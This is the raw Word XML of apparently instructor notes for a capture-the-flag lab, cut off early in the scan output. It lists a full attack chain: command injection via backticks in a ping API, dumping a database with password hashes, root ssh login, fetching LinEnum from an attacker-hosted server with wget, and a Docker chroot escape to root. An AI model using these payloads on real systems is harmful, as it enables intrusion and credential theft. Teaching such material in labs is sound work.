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04D4" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>TL;DR process report, listing all commands</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73E80BA9" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>(Give a copy of this to students for reference after completing this box)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="281439A6" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="2AF45479" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="7A595E26" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -T4 -A -p- &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ip.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&gt; -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> scanOutput.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="517DE0D9" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>gobuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -u http://&lt;ip.adr&gt;:&lt;port&gt; -w /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>usr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/share/wordlists/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>dirbuster</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>/directory-list-2.3-medium.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6527C736" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>wfuzz</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> -c -f sub-fighter -w subdomains-top1million-5000.txt --</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>hw</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;wordcount-to-exclude&gt;  http://10.10.61.189:31331/FUZZ</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42124F6A" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">- if there’s a web server, look for robots.txt </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="537D6575" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">- in </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>js</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> prioritize anything that looks like an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>api</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>, like “api.js”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CAA0C14" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>- Look where command-line-like execution is occurring (here, showing an injection opportunity)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="729E152F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>*Be able to recognize this as valuable info!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359F9593" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">const </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> = `http://${getAPIURL()}/ping?ip=${window.location.hostname}`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4639F8A7" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>- backticks allow us to run a command with higher priority</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3904E6C0" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">- show the data we can read when connecting to the API </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C15238D" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ip.target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&gt;:&lt;port&gt;/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ping?ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>=`</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ls`</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="22019CDC" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">- show contents of a discovered </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>sql</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> database</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EB6616" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">http://10.10.61.189:8081/ping?ip=`cat </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>utech.db.sqlite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>`</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BB81C62" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>- expect output that looks like : \ufffd\ufffd\ufffd(Mr00tf357a0c52799563c7c7b76c1e7543a32)Madmin0d0ea5111e3c1def594c1684e3b9be84.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31258C88" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">- Identify this as valuable hash info. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088D0857" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">- use </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>crackstation</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> to reverse hash and get pass for root.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2585974C" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>- login to ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="110A001A" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ssh r00t@&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>ip.target</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47B28F7B" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">-set up </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> on </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>atk</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> machine (or download </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>linpeas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>winpeas</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">, whatever enumeration is necessary for the target). Then start python server from that </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>dir</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="283737B4" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> 8080.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6960BBF2" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">(note </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>tha</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> port 8080 has to be used if 80 is busy)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F171EA9" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">- Make sure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> is transferred to target via </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> (similar to curl)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75001AE0" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>wget</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> http://&lt;ip.attacker&gt;:8080/LinEnum.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2013E948" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">—&gt; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> +x LinEnum.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E923D5" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>LinEnum</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> reveals Docker (whatever service should prompt research into GTFO bins for possible escape)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29107075" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>- from the Docker GTFO bin, try to modify the guided code for current context (ex. In our environment, “bash” is used, not “alpine” as in the GTFO bins’ source example)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76B6F651" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>docker run -v /:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> --rm -it bash chroot /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>mnt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="64147C02" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>- find ssh key location</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40BADCF7" w14:textId="3D424C97" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>cd /root/.ssh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBBD52F" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="4FEE43AA" w14:textId="4DAE92CB" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="007A67A4">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>— Actual report —</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41600317" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="1B6362AC" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Initial Scanning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ECD27BE" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>sS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> -T4 -A -p- &lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>ip.addr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>&gt; -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> scanOutput.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F7A73E6" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="07BD0A29" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">Do a stealth scan </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>att</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> speed 4</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A3B84EF" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Combined scan with -A, running default scripts, so this will take some time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5867ADF3" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>oN</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> gives me the scan output in a .txt file so I can read it easily with [less] and add it to my notes easily.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C891720" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="5248E3EA" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="515C782D" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>Scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="637B2CF7" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>PORT      STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0778D8AD" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    open  ftp     </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>vsftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve"> 3.0.3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="421D0943" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4"/>
    <w:p w14:paraId="6EF933D1" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>22/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007A67A4">
        <w:t xml:space="preserve">    open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6945C904" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>2.0)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="353D9477" w14:textId="77777777" w:rsidR="007A67A4" w:rsidRPr="007A67A4" w:rsidRDefault="007A67A4" w:rsidP="007A67A4">
      <w:r w:rsidRPr="007A67A4">
        <w:t>| ssh-</w:t>
      </w:r>
